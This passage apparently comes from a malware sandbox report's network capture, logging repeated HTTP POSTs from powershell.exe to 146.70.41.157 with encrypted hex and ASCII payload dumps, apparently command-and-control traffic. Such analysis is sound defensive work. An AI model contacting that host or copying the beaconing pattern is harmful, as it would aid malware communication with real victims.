                                                                                                    Data Raw: 0c 69 f2 cc 32 a1 cf 17 d3 08 b0 88 2e e9 34 55 a2 c7 91 69 22 c8 a4 f3 91 d6 ee e1 f7 7a 35 f6 e0 97 d4 78 12 ab e4 2f f7 57 29 86 03 0f 82 47 3f 13 28 02 cf 31 73 04 b3 c9 22 bf 58 61 1c e0 58 90 ae b6 ed a2 64 14 f7 53 22 b6 f9 f2 f9 8c 6f 04 03 63 a2 19 b9 4f a3 fc 07 3e d7 77 3a 24 5c e6 86 c3 3d 0c 48 63 3f 65 50 03 84 d0 77 11 ce cd a0 68 a1 14 a2 a8 de 0d 5d 48 9b 08 33 44 7c 51 d5 89 b7 78 ff 97 ca 56 86 4e 33 16 46 cb 77 ac ce 4c c9 ca d2 80 11 01 85 bf 19 84 3d 42 87 c5 6a 0b 05 8f 65 ec b8 b5 54 b3 7b 7f 93 2b 40 1e 58 8d cb 9f 19 73 7f 7a db 1b 5c 28 f0 29 db c0 f1 75 95 10 12 ab 9f e5 00 fd e1 a4 89 01 0f b0 64 c6 77 62 12 bf ff a7 b9 c4 70 d4 c5 cc 24 ed df 18 7d ad 4c 83 b4 53 fd bb 5d 61 85 32 ae 81 2b 37 fd df 04 9f f4 87 55 81 cd b4 f7 73 b7 ef b5 c7 dc b4 92 d1 53 8c cf 2f 65 7f f7 0a a5 3f 95 e6 a3 e7 66 69 9e 83 46
                                                                                                    Data Ascii: i2.4Ui"z5x/W)G?(1s"XaXdS"ocO>w:$\=Hc?ePwh]H3D|QxVN3FwL=BjeT{+@Xsz\()udwbp$}LS]a2+7UsS/e?fiF
                                                                                                    Oct 4, 2021 21:30:11.285759926 CEST2820OUTPOST / HTTP/1.1
                                                                                                    Host: 146.70.41.157
                                                                                                    Content-Length: 531
                                                                                                    Oct 4, 2021 21:30:12.072438002 CEST2823INHTTP/1.1 200 OK
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 213
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: a4 12 7d ad 56 90 d2 67 08 5a 48 dd 4e 16 04 c5 29 6f e2 bc 13 c3 c3 58 cf 93 69 44 6b a7 5c c4 34 b4 5f c7 69 73 bf 46 6a d9 9a 76 b3 23 15 34 7c 83 af f0 b7 1f 80 c9 c1 f1 53 6d 01 d0 84 15 f5 ff b3 b9 9f 8e f2 ac d8 47 90 78 c7 21 36 a5 dd 51 76 fe 27 b4 fc 08 64 a1 6b 7b 2b 37 f7 8b 09 67 92 a3 b1 df e9 14 9e 10 d8 d9 d9 3a 29 76 6d 37 1c 10 2f 1d c6 b9 7e 72 e9 dd 2e b7 28 7c 72 fb 5a 49 00 b0 ff 6b 0a 2f 18 ce ed 70 7a fa c6 86 73 b1 e7 eb f3 ef 8b ca 53 6f cf 52 7b 34 15 43 dc 19 55 e1 4e c3 9f cb d7 d6 73 81 ca d4 db d7 dd 35 54 e0 9a 26 78 8a 9b a3 23 81 2e 1f 09 00 cf 27 00 87 15 86 17 9e df 08 ee 80 9d 92 88 79 3c 4d 27
                                                                                                    Data Ascii: }VgZHN)oXiDk\4_isFjv#4|SmGx!6Qv'dk{+7g:)vm7/~r.(|rZIk/pzsSoR{4CUNs5T&x#.'y<M'
                                                                                                    Oct 4, 2021 21:30:12.176701069 CEST2823OUTPOST / HTTP/1.1
                                                                                                    Host: 146.70.41.157
                                                                                                    Content-Length: 273
                                                                                                    Oct 4, 2021 21:30:12.941164017 CEST2825INHTTP/1.1 200 OK
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 295
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 11 22 72 90 6b 01 34 a9 41 8c ec 51 06 31 aa 5c 8a df ba 55 5e 03 76 4b 6a 3b 36 e6 d7 de 76 98 96 78 8d be 10 55 66 91 44 f0 b8 08 70 7c 05 01 20 e9 01 b7 f9 75 21 0a 74 0a 73 05 f0 87 e9 e6 27 25 04 38 e6 8b 64 60 1a 36 b0 a1 d8 d8 e8 35 5f 08 82 a1 aa df 88 f7 fa e6 8a 76 4d 0b f6 04 73 66 dd 2b ec 3a 48 e3 9b 64 e4 75 ee 3b fd ea 32 1f dc a0 0c 4e 39 e2 79 f1 18 d0 de ac 6f ec 68 6f a8 42 76 66 1a 80 3f 47 44 bc 4a 5f ae 6c 94 45 05 71 53 56 50 85 6a 8e 3b 19 4d 22 f3 51 51 b7 b4 b1 36 b0 6c 50 57 61 1a 2e 81 ea e6 a6 7f e3 17 31 5e ce f0 69 35 6d 37 22 57 bb 97 07 27 79 d7 c5 96 61 ce 57 7b 03 76 88 cb 8b bb da 91 8d 71 98 a4 20 00 ce fd cd 06 c0 fc 8b 86 ab 71 84 6b b8 9e 77 68 f8 4d 5c d4 fa d2 e7 86 eb 6c 08 e6 ed 84 cc cc 63 0f 37 46 fa fe 1d 7e 81 a1 e5 4a f1 b1 98 f3 b0 04 a9 7d 19 fe 36 ee c1 df 79 4e 82 32 25 ad 73 dd d2 68 ea 99 24 ba c6 c9 bf 42 6e 70 bd d6
                                                                                                    Data Ascii: "rk4AQ1\U^vKj;6vxUfDp| u!ts'%8d`65_vMsf+:Hdu;2N9yohoBvf?GDJ_lEqSVPj;M"QQ6lPWa.1^i5m7"W'yaW{vq qkwhM\lc7F~J}6yN2%sh$Bnp
                                                                                                    Oct 4, 2021 21:30:43.772115946 CEST2826OUTPOST / HTTP/1.1
                                                                                                    Host: 146.70.41.157
                                                                                                    Content-Length: 461
                                                                                                    Oct 4, 2021 21:30:44.559027910 CEST2827INHTTP/1.1 200 OK
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 290
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: e2 e2 99 4f 81 2b dc 0c 17 be 80 8a 63 aa 5d f4 fd 30 a4 a7 42 c5 0f 3f 68 69 ab b6 e2 32 3d 9e 0e a8 d5 4d 61 f8 91 15 d9 7b 02 96 93 52 e2 7e 79 8d 9b 16 cb 09 f7 ac 76 03 e1 b5 47 dd e4 bc e5 6a 1c 48 73 f7 46 bc c7 8c 4d 15 19 79 67 4b fd 5e 7c 32 e7 58 e3 61 f8 64 0d f9 71 61 b4 84 a2 2c 01 d9 f3 19 8d 2f e0 6e 4c 52 cd 64 76 2e 4b 66 91 3f b2 12 70 06 f2 d0 92 a9 3e cb 7d 30 e9 fa e9 8e 02 6d 15 25 25 e3 63 17 cd f1 f3 d3 b8 f3 54 dd e9 0d c4 d3 bf 69 35 cb b6 2f 96 01 eb b4 d2 44 d5 c8 8a 6b 17 f7 9c d4 62 23 dd ae ce 2b 23 70 41 64 30 bd 58 13 bc e1 fc e3 75 05 93 e9 0b eb 3b 14 21 f1 c0 51 5e 1e 2f 05 f0 7d 82 00 df 25 90 95 82 b9 aa 94 fb c1 d9 b8 e6 96 c5 85 19 7f 40 4b e1 de 44 35 d8 4d 9a eb 11 de fd 5a 1d 1e 7f 35 00 0b 03 95 86 4d cf 3b ea 27 47 0b 55 aa 4a 8a b9 40 8b 50 bd d5 8c bc b8 7c 72 0c 4f 87 29 ba cb 69 62 47 58 8e 6a a1 c3 ba 85 af
                                                                                                    Data Ascii: O+c]0B?hi2=Ma{R~yvGjHsFMygK^|2Xadqa,/nLRdv.Kf?p>}0m%%cTi5/Dkb#+#pAd0Xu;!Q^/}%@KD5MZ5M;'GUJ@P|rO)ibGXj


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                    2192.168.2.449828146.70.41.15780C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                    Oct 4, 2021 21:29:42.560785055 CEST2748OUTPOST / HTTP/1.1
                                                                                                    Host: 146.70.41.157
                                                                                                    Content-Length: 395
                                                                                                    Connection: Keep-Alive
                                                                                                    Oct 4, 2021 21:29:42.699840069 CEST2748OUTData Raw: 30 76 a9 b1 2a a0 27 5b 86 98 fe 8a fc 28 76 ec 1e cd 38 16 96 8b 89 a8 ae 3e f2 c5 64 2d 22 61 22 a6 6f d4 93 22 c7 90 71 4b 4a 6d ee 1d ed 2e c2 5d 8c 27 e5 e8 ae a3 ec 02 04 eb ac 61 f5 5a 77 9d 68 56 b7 a1 5a fb 06 a6 a4 4b 42 1c b8 91 4f c5
                                                                                                    Data Ascii: 0v*'[(v8>d-"a"o"qKJm.]'aZwhVZKBOz9TRv!"@DcbHr^}#/^*Q&gP9sR4/J5.SV!/1Fc0YQ2Jf"0I@hVX=nV
                                                                                                    Oct 4, 2021 21:29:43.475663900 CEST2750INHTTP/1.1 200 OK
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 275
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 08 d2 a2 9c 1c 7a 8b ce 43 9e da 1d 87 04 83 15 35 55 8b a7 07 2d 38 17 30 bc d2 0e b5 f6 2f d6 fd d3 29 2f bb 73 6b 10 38 f5 53 5a bf 52 0d 3e ea 64 98 53 4f 1e 19 e0 1d a3 5c 0a d8 1f 6f 4e 87 03 72 46 1d 37 05 16 1c 99 2b 46 f6 7f 21 f6 b4 0d 2e 84 05 f5 c8 32 34 40 18 8d a3 86 51 3b f7 ce d1 57 5c 74 b7 e7 f7 ec 86 c9 d1 87 9d 29 2b e0 e5 83 e5 9a c1 1b 52 dc 5b 74 dc 5a ce 5f 4a 07 01 65 e5 7a 52 4a 99 4b 47 4d 20 bf d5 cf 64 34 99 7c e6 15 a8 33 2c 09 4a c6 d9 23 5f 12 df 5c 8d 43 e0 d7 c6 6a 50 b0 01 12 11 f0 f1 9f 7f 61 b9 8b d4 fd 8e 51 7b 82 c6 c7 80 9a f1 7e f2 41 e5 ad 77 0c 12 41 ed 13 f6 53 64 e8 10 a9 e1 a8 4f b3 40 b4 03 64 30 a2 12 e4 67 bf 73 71 d8 33 17 04 43 a9 bb 69 f5 fe 1b cd ce 45 36 aa df eb 00 92 85 ff 07 29 93 ec c9 aa 0a 9f f0 bc f9 0d cc 9e 99 b3 c3 a8 ba 21 b1 51 5c f3 2a f8 31 10 0d
                                                                                                    Data Ascii: zC5U-80/)/sk8SZR>dSO\oNrF7+F!.24@Q;W\t)+R[tZ_JezRJKGM d4|3,J#_\CjPaQ{~AwASdO@d0gsq3CiE6)!Q\*1
                                                                                                    Oct 4, 2021 21:29:43.577924967 CEST2750OUTPOST / HTTP/1.1
                                                                                                    Host: 146.70.41.157
                                                                                                    Content-Length: 363
                                                                                                    Oct 4, 2021 21:29:43.716029882 CEST2751OUTData Raw: 65 4e 24 67 22 bd 6a e2 9b f2 67 4d b2 07 56 0c 41 26 9e 34 74 7e 4d 45 18 6a ae f6 9a b3 e9 67 61 3e cf 1d 1c 6e 46 58 53 55 c5 71 f6 53 55 76 25 01 6f 12 34 8c ca e6 01 dd 4f b7 10 72 49 e6 09 fe ea 74 37 3a ef d2 df 47 df 20 b8 da 4e c4 15 38
                                                                                                    Data Ascii: eN$g"jgMVA&4t~MEjga>nFXSUqSUv%o4OrIt7:G N8E4r> Hhh@2.%0NR!S@:r }p9SEg;uPHf9Pox=B*rAMB2tWfByL7\!CV[&"
                                                                                                    Oct 4, 2021 21:29:44.371078014 CEST2752INHTTP/1.1 200 OK
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 335
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 27 fd 99 13 41 2e e9 db 5c a6 d7 97 29 38 80 77 89 c3 10 78 f3 75 89 e9 04 eb 6e 52 73 5b 39 82 62 79 35 ed 0a 28 ef 4c 0f fc 4b 15 47 69 af 7e 78 81 75 6a 14 2c 56 d0 ec ec b4 58 e4 ad 9b a2 f5 39 1c da 62 13 df 31 8c ba 73 d0 71 fc 20 b3 9b e5 41 7b 9d 33 52 29 75 ab e4 5c 99 08 31 1a a5 01 11 5f b8 42 74 22 fd 83 28 02 b9 6d 49 be 21 bd 21 09 37 46 b9 bf a4 63 6e a4 bf b4 b9 75 8b e0 ef 09 32 35 55 f3 06 cc 68 5f c3 b1 27 4b 87 cb 2e d6 65 85 ae e9 0a f2 56 c6 7b a1 2e 9e 16 98 e6 93 05 91 97 c7 0b ec 64 1a 67 e4 3b d6 82 f7 e4 86 5e 6a b8 36 85 ac ad 32 c1 fc c5 b7 97 4b 9c 65 ac 90 a7 0c 80 01 49 3e dd 4e d2 51 5b ce 0e 24 85 5c 23 4f de 23 a4 18 08 4d d5 8f 16 68 ff 68 82 fe e3 c2 21 e2 ef 9e ac 78 95 e0 e5 f1 39 0b 1a 35 bf 45 19 bc ed b9 25 ec 00 9e 8a eb be b0 9c 0c c2 68 b3 7a 1a b6 dd 45 a7 b0 a6 5b a9 f8 da 3b e8 14 d9 5d c6 8c 57 86 30 cd 6c e9 eb 11 2f bd 97 a4 b4 a8 bc 2e ec c1 ce 1c b6 5c d1 14 ed 68 c6 8d a4 37 8e 0f ad 2d 61 bf 2f 39 de 3a 3b 13 16 2d 4a 86 1f 3c 5b 42 a8
                                                                                                    Data Ascii: 'A.\)8wxunRs[9by5(LKGi~xuj,VX9b1sq A{3R)u\1_Bt"(mI!!7Fcnu25Uh_'K.eV{.dg;^j62KeI>NQ[$\#O#Mhh!x95E%hzE[;]W0l/.\h7-a/9:;-J<[B
                                                                                                    Oct 4, 2021 21:29:45.116631031 CEST2753OUTPOST / HTTP/1.1
                                                                                                    Host: 146.70.41.157
                                                                                                    Content-Length: 615
                                                                                                    Oct 4, 2021 21:29:45.255422115 CEST2754OUTData Raw: 81 90 58 bf 10 f8 43 87 c8 0d fb a4 da 8e 01 0f f4 86 57 63 24 7a 6d b1 3b 04 21 10 31 f7 12 0d 73 69 04 8b a4 90 39 f4 86 09 c7 bc 62 99 eb 81 bd 57 34 3f 91 2f 99 08 23 a5 84 0c d7 33 57 cf fa ee 31 71 8b 75 6a 64 4d 62 db 1c b1 b0 4f a0 17 9e
                                                                                                    Data Ascii: XCWc$zm;!1si9bW4?/#3W1qujdMbOR{Eh-Tri{H/R~UrW9}(tlX!Ei8LP*8s5|g:wzYF(R.a5UAk}a)<q-~SS#I/P%5y
                                                                                                    Oct 4, 2021 21:29:45.861023903 CEST2755INHTTP/1.1 200 OK
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 243
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 1f 9e 63 49 d5 7d 43 46 57 8e 80 3f 23 5b 4d eb 13 e8 09 10 94 a6 90 6b 72 3a cb 61 65 25 f1 8d 20 8c fa 63 ee 90 18 21 72 fe ef 8a 47 34 f1 ca 08 4e 66 f8 d3 13 13 2e 5e 8a 3c 77 58 47 9a d6 35 3c 63 dc a5 c2 0b 7a c8 81 c5 2b e9 d4 b3 5b 35 c1 52 be 79 15 52 e2 a9 6d 0d 1a 4f 23 63 55 85 c2 1d 40 27 3c fa 93 42 e6 b5 60 4a 35 50 cb 05 b7 12 c1 be 0b 4a 94 0e ad bd a9 1f 5e 1a 6e 2d 12 c0 0b bf 01 e4 0d 6c 76 d3 99 35 a2 f6 ad 7a dd e2 c4 d4 1c a9 9e d3 6b ad 57 6a c2 99 11 e8 a1 00 46 d2 07 71 36 ac 77 37 1f ae 2b 40 cf 76 c8 55 02 f3 b7 d3 7d ac 25 ee fd 20 ec 79 04 f3 ba 65 c9 f4 04 83 e4 8f 86 69 28 c5 96 70 03 85 e3 02 af 97 f3 c6 e0 a6 68 f5 5f 7d 5d 5e 26 02 8a 17 00 a6 61 3e 5b c9 97 01 ce fd b5 58 d1 b5 d4 a3
                                                                                                    Data Ascii: cI}CFW?#[Mkr:ae% c!rG4Nf.^<wXG5<cz+[5RyRmO#cU@'<B`J5PJ^n-lv5zkWjFq6w7+@vU}% yei(ph_}]^&a>[X
                                                                                                    Oct 4, 2021 21:29:46.019980907 CEST2755OUTPOST / HTTP/1.1
                                                                                                    Host: 146.70.41.157
                                                                                                    Content-Length: 516
                                                                                                    Oct 4, 2021 21:29:46.157608986 CEST2756OUTData Raw: 61 5d 76 5a 15 5e 36 e1 ec a2 6d c5 b2 a6 43 0d 5d 5b d6 d6 79 e9 9e a2 5b 30 11 96 f9 59 74 6a 02 fb e3 d9 f4 a0 0d aa e8 db c2 a6 50 55 f2 b1 05 94 cf 02 6b 5a 14 77 bd d2 fe e4 4e 9f e7 93 2e 04 c3 b6 c1 68 17 bb 4e 2d ec 9c 27 f7 53 06 3d 5e
                                                                                                    Data Ascii: a]vZ^6mC][y[0YtjPUkZwN.hN-'S=^fsm"'\I/yM=}?mwPTM'umu:qVm;s%HsnOoXF{F\7Tqci5a|5Pq&&"eX4_r7rq.LxGZD
                                                                                                    Oct 4, 2021 21:29:46.796282053 CEST2757INHTTP/1.1 200 OK
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 280
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 9c bf 2e ba 2c 36 ec 29 cd 40 18 3e d7 89 9a d5 4a 5c 1b 0c 51 b3 87 58 70 50 d0 ba 36 93 a8 2a 1b ed ff eb ca 46 28 6f 03 5f 4e ce a7 c1 d1 c4 37 73 6a 0a 1e 07 53 80 73 a3 75 69 82 d5 af d9 59 13 5b 69 c8 90 63 89 54 2a b4 7b 80 7c 06 e0 ec a8 d4 24 51 83 d7 ff c1 4b 23 4e 9b b7 03 c4 91 ba 10 5c 86 8d 56 cb 22 6b 2b 8a cd df 4c ed 64 71 12 be 4e 9e 56 a2 13 81 bc af 56 ed 72 35 01 2c 7a 6b 10 d0 b4 aa 25 5a 03 7b a4 d9 f7 05 7e bf 94 dd 97 60 e3 65 75 ca 01 88 2c bb 9b 0e 29 0b 09 bf a1 3e 53 84 f3 c9 89 45 f1 d4 7b 9a f2 81 19 99 51 e8 7a 12 f7 62 af cf 67 d8 32 91 25 44 7a 86 b3 1a cd 00 3e d7 81 45 68 d4 b9 54 9d 85 90 53 3c 27 78 c8 8c f0 16 39 e0 4f bd b6 81 1e 58 3a 8e 9e 64 e4 6b 58 35 cd 76 e8 1a 7d f1 43 79 ab f0 0a 39 78 59 cc 4a e1 ec 7e a9 c3 3a 84 c1 e6 63 6c 42 a7 45 4a b2 ed 8b a3 b6 14 5e e0 f2 98 84 ba 3d dd
                                                                                                    Data Ascii: .,6)@>J\QXpP6*F(o_N7sjSsuiY[icT*{|$QK#N\V"k+LdqNVVr5,zk%Z{~`eu,)>SE{Qzbg2%Dz>EhTS<'x9OX:dkX5v}Cy9xYJ~:clBEJ^=
                                                                                                    Oct 4, 2021 21:29:46.908816099 CEST2758OUTPOST / HTTP/1.1
                                                                                                    Host: 146.70.41.157
                                                                                                    Content-Length: 471
                                                                                                    Oct 4, 2021 21:29:47.047002077 CEST2759OUTData Raw: 2d 6d f0 07 5d 78 5a c4 3b db 78 88 f9 2e c3 7b b2 24 d3 48 67 4a 04 7f 7a 51 7e 3a 76 e5 76 7d a4 03 1f bb 13 8f d9 fd e2 10 d1 bd 52 47 7a ad c3 75 95 7a ee b2 0f e2 6a 71 8c 0c f8 20 4f 55 66 fa e2 f7 10 08 69 24 49 d5 65 57 77 45 2d 33 d6 d0
                                                                                                    Data Ascii: -m]xZ;x.{$HgJzQ~:vv}RGzuzjq OUfi$IeWwE-3vP;R}XWdq1Mk%EY4(Njl!zV4u<.\sxr}CQG"q8nX&Lmw#\i.^*RN'~R#8/;SZBFX
                                                                                                    Oct 4, 2021 21:29:47.675327063 CEST2759INHTTP/1.1 200 OK
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 262
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 9c 95 46 67 64 f8 14 80 48 a6 98 cc cf 31 98 27 53 80 0f 08 37 0f 63 3e 08 52 19 84 83 21 87 1f 4d b5 e2 1c 25 b8 8a 0c fb 4c 50 8d cd 48 8b c2 07 8a 87 62 d3 92 30 ab 7a 2e 5b 2f fd 73 3c 2a 31 d3 ec b4 c9 5d e7 34 d4 4d 34 79 93 c0 8a 32 ab 30 fa 2b 5d 5e 16 fe 9e 95 9e 3e 68 53 b5 1b 9d 33 f6 b2 a6 2f 95 d0 d9 bd 03 19 ec 2f ac 4c 20 9d f2 4c f2 09 2d c9 6c 73 c6 9b 60 8c 84 dc c3 2e ed 77 9a b2 50 aa 13 c3 12 fb 88 aa 2f f9 a8 7b 4c 66 0a c5 b8 bb 87 c8 23 b1 0e 11 84 fc 43 ff 09 8e 35 89 5d 4c e2 f8 44 0b 48 54 43 38 64 e8 51 d6 bf 00 f6 60 a8 68 5b 29 9e bf cd d8 81 fa fa fa 9b b3 b7 ae 6a 4f 27 11 9b b8 c5 0b 32 1f cb 1f c3 c2 b5 f3 03 d2 38 39 99 e9 9e 8d 4d 3e db 4d 81 93 8c ae 41 e5 6d 77 af b6 0a 80 99 ae eb f8 94 bf 4a 37 a7 98 37 fc 99 80 e4 c4 da 5b eb e7 e6 d6
                                                                                                    Data Ascii: FgdH1'S7c>R!M%LPHb0z.[/s<*1]4M4y20+]^>hS3//L L-ls`.wP/{Lf#C5]LDHTC8dQ`h[)jO'289M>MAmwJ77[
                                                                                                    Oct 4, 2021 21:29:47.783431053 CEST2760OUTPOST / HTTP/1.1
                                                                                                    Host: 146.70.41.157
                                                                                                    Content-Length: 427
                                                                                                    Oct 4, 2021 21:29:47.923537970 CEST2761OUTData Raw: 86 57 2c 4f 05 03 6f ae 2f 92 54 80 1a d7 b9 1f 52 a0 c0 c4 5b 7c 18 80 dc 17 df 46 55 05 58 e0 ca b6 5c 4b 42 90 65 22 18 49 8c 90 6d 8d 7c 84 e5 1b 51 2d df 1c 06 0a 3f aa 72 ed 23 2a 59 2b 3a 73 b5 63 7b 6f db c1 3b 9f ad 12 ee 87 13 50 9a 5b
                                                                                                    Data Ascii: W,Oo/TR[|FUX\KBe"Im|Q-?r#*Y+:sc{o;P[_;+RwbVw>@n#Twr)cE"2wR%9A8T$8$Gf.t"RFiQr>`iSh/}Odz1heEEV(
                                                                                                    Oct 4, 2021 21:29:48.543337107 CEST2762INHTTP/1.1 200 OK
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 220
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 09 b2 c8 3c 73 2b 82 f9 a2 cb ed 21 ef 48 ec b4 d1 e9 0b 7a 5e 63 d0 14 0a fa ad 22 0b 58 15 9f 44 04 b4 79 b7 6c 45 da fc 0d 02 db 4d 75 d4 89 b3 ca 63 57 ab 75 36 b1 58 a4 fc 82 23 f3 af a0 7b fc 61 b7 67 19 42 29 d6 eb b4 06 54 9f c8 06 24 33 44 e4 16 ea 50 8a 17 19 51 bc b3 f8 97 17 7a 1e 5f b6 de 6c 9a 6d 8f 55 0d 22 e5 1c 29 d0 c7 84 38 92 18 8d af 69 85 f1 bd 66 b2 7b ba 21 9b 7c 6b 2a c9 8a 21 ab d8 36 2e 00 9a 66 4a 4d f6 67 eb 2c 5e 4c be 9d 65 59 fe 4f c7 6d c4 e4 b1 67 b8 05 1c 76 7f b1 14 53 f3 90 cc 19 2f 26 81 57 62 f1 40 4f 98 69 ea 21 4c ef e4 3d 3a 98 29 29 30 ba fa 92 14 7c 3c 61 f6 2a 1a 93 38 7f f3 2d 31 4b d9 ee 33 3c b9 1f 67 20
                                                                                                    Data Ascii: <s+!Hz^c"XDylEMucWu6X#{agB)T$3DPQz_lmU")8if{!|k*!6.fJMg,^LeYOmgvS/&Wb@Oi!L=:))0|<a*8-1K3<g
                                                                                                    Oct 4, 2021 21:29:48.935764074 CEST2763OUTPOST / HTTP/1.1
                                                                                                    Host: 146.70.41.157
                                                                                                    Content-Length: 601
                                                                                                    Oct 4, 2021 21:29:49.077250004 CEST2763OUTData Raw: 05 52 77 c5 e0 e2 ba cb 11 c4 7e 51 8e 69 fa 83 cb 55 e9 1c 23 c6 2d f0 4d cc 63 d3 dd 08 b1 3c 42 41 ed 5d e7 49 de 0f 02 a4 1c 41 a0 62 6a 9e 03 8b c4 05 54 b7 94 3d 25 86 79 15 7f e6 ed 09 14 43 10 4d 7a 9d 9b 83 75 da 1a 7d ab eb 51 e9 62 c3
                                                                                                    Data Ascii: Rw~QiU#-Mc<BA]IAbjT=%yCMzu}QbSC9a.^R%dAx96fZe:LElco ,@M|[,RzCm8HetyLDmv:CMC'J[5pRS,=MK%+u
                                                                                                    Oct 4, 2021 21:29:49.657401085 CEST2765INHTTP/1.1 200 OK
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 210
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 20 2c 85 d3 8d e3 30 9c 8b 5a 87 90 2b 19 06 6d 3b 89 bb 0c be 0b a4 a5 3a ec 90 fb ac a6 27 8e f0 1b 4d f0 eb 7f a6 74 5c 7e 0f b5 b8 9e cd 36 9e 8f a3 42 c7 ec 0b fe 28 41 7e e8 08 72 43 d2 53 a8 82 e9 8a e5 4f 65 0d 7d ce ca 17 4c ed 0a 48 f7 c5 87 09 c1 19 45 54 0d 93 a0 87 18 78 31 ce ee 46 d5 ff b8 6a ae 97 46 ae c3 d0 d1 74 e1 a0 e3 c4 cb 61 92 d5 35 46 d9 65 f0 6e 5c d4 7c a7 00 20 39 f5 49 f9 b0 0f 40 54 0c dc 27 c0 bd d3 c3 9a 34 76 be ef 93 14 bb ab 8c ac f0 49 f0 14 4a cd ed a8 ef e9 2a 64 6f ab 42 25 36 e4 eb 07 ae f3 c9 fc bc e4 15 62 4b 6f a3 80 71 b3 fc 0f 9b 82 0b 41 0a 56 36 8b 36 de 17 9e 6e 2b b8 c0 94
                                                                                                    Data Ascii: ,0Z+m;:'Mt\~6B(A~rCSOe}LHETx1FjFta5Fen\| 9I@T'4vIJ*doB%6bKoqAV66n+
                                                                                                    Oct 4, 2021 21:29:49.767855883 CEST2765OUTPOST / HTTP/1.1
                                                                                                    Host: 146.70.41.157
                                                                                                    Content-Length: 719
                                                                                                    Oct 4, 2021 21:29:49.907336950 CEST2766OUTData Raw: ec 97 b3 cc 99 a5 dd 49 48 b6 46 83 1c 2f 88 65 fe 7e ad f3 d8 2f 6b 2b 47 b2 a8 6b b3 57 49 ca 5d f8 6e 91 7e e7 f8 d2 cd 39 07 63 0c 3c df 8a b2 11 da 8b a1 80 19 be 2c 88 85 e6 fc 73 95 f0 6e 7b 26 23 bf f5 e5 18 84 da 26 a0 28 09 20 0c d1 1e
                                                                                                    Data Ascii: IHF/e~/k+GkWI]n~9c<,sn{&#&( |)fb[*[w#hztSIBqSxbiCD=|-:{yMbs)KpS)>!4bi8IMA"g0?\i<NfjvF
                                                                                                    Oct 4, 2021 21:29:50.524455070 CEST2767INHTTP/1.1 200 OK
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 204
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 6b 82 a6 be 1e 03 f8 8a d4 83 2f 40 a7 b6 cc d5 54 3b 1b 97 34 7c 3a 89 58 32 8b 14 91 d9 25 a4 18 c8 d8 cc 6e 4d ab ee cb f6 a8 c8 95 f9 03 18 0a 68 e8 6e f4 61 7b 78 13 fa a5 be fb ef 3c 3b 7f 2f 9b 6a 5c 21 9c 7a b2 eb 52 57 a1 20 9b 9d ec 6f cb 04 8b 58 7c 4b 2e 37 bd 4c 3a 68 54 ab f1 f9 d9 9b 80 64 74 d3 c8 68 f5 aa ef 73 7d 66 7b 17 1c 68 e7 7a f4 ba 4c 24 13 00 28 85 1f 41 86 62 bd 5b 9f 99 74 81 f4 3e 56 ec be ec 73 35 1c e7 54 78 6b 7d a9 dc e7 d9 6b ce 7d 9e e4 d5 c0 41 0d dc f8 c0 98 99 72 0e a0 39 3b 9e f4 6f 21 8a b8 8f d7 90 71 1e d9 04 e4 8c bb f6 0a d1 6f c0 1c 29 87 ca fe d2 8d d3 7c fc
                                                                                                    Data Ascii: k/@T;4|:X2%nMhna{x<;/j\!zRW oX|K.7L:hTdths}f{hzL$(Ab[t>Vs5Txk}k}Ar9;o!qo)|
                                                                                                    Oct 4, 2021 21:29:50.642749071 CEST2768OUTPOST / HTTP/1.1
                                                                                                    Host: 146.70.41.157
                                                                                                    Content-Length: 364
                                                                                                    Oct 4, 2021 21:29:50.781986952 CEST2768OUTData Raw: a5 d4 32 e7 18 74 0f c0 39 01 8c 05 3f c8 23 57 79 5d d5 34 f4 38 d1 1a bc b4 a9 b4 89 e0 61 7e 7d 0b d3 35 45 8f b2 22 71 66 22 09 71 c9 3a 87 98 48 ed f0 6d d2 4b 6e 04 18 2c 63 ca 59 37 57 9f 0e 86 34 f3 ed 12 e9 a9 b4 c2 8e 17 c8 a8 f1 7a 22
                                                                                                    Data Ascii: 2t9?#Wy]48a~}5E"qf"q:HmKn,cY7W4z"Aof1-cPV/icD6GX:o9=d0tZ^C2M1KomKqW.1y"#%:xA0Z_KtZSUj|g{6L9b94;o;e
                                                                                                    Oct 4, 2021 21:29:51.402406931 CEST2770INHTTP/1.1 200 OK
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 173
                                                                                                    Connection: keep-alive
